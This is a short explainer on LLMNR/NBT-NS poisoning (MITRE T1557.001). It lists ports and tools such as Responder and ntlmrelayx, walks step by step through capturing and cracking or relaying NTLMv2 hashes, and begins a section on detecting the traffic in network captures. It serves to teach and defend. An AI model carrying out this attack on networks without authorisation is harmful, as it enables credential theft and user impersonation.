LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are fallback name-resolution protocols used by Windows when DNS fails. Poisoning those requests means an attacker answers the broadcasted name lookup, impersonates the requested host, and causes the victim to attempt authentication—leaking NTLM/Negotiate authentication data (challenge/response) that can be captured for cracking or relaying.

MITRE ATT&CK ID: T1557.001

1- Quick facts

• Protocols / ports: LLMNR = UDP 5355, NBT-NS = UDP 137.
• IPv4 multicast (LLMNR analogue): 224.0.0.252 — IPv6 LLMNR: ff02::1:3.
• Common tools (observed in labs): Responder / Inveigh (listener/catcher), ntlmrelayx (relay), responder-style sniffers.
• Data leaked: Username, domain, NTLMv2 challenge/response (NTProofStr + NTLMv2 response). No plaintext password is sent.

2- How the attack flows

1. User tries \\\\DCC01\\share (typo or DNS failure).
2. Windows issues LLMNR/NBT-NS query: “Who is DCC01?” (broadcast).
3. Attacker replies: “I am DCC01 — here’s my IP.”
4. Victim connects to attacker and performs Windows authentication (SMB/HTTP/LDAP).
5. Attacker captures NTLM challenge/response packets (NTProofStr + blob).
6. Attacker either:
   • cracks the NTLMv2 hash offline, or
   • relays the auth to another service (SMB relay) to impersonate the user.

3- What you see in network captures (Wireshark / PCAP)

• LLMNR queries: udp.port == 5355 or display name llmnr.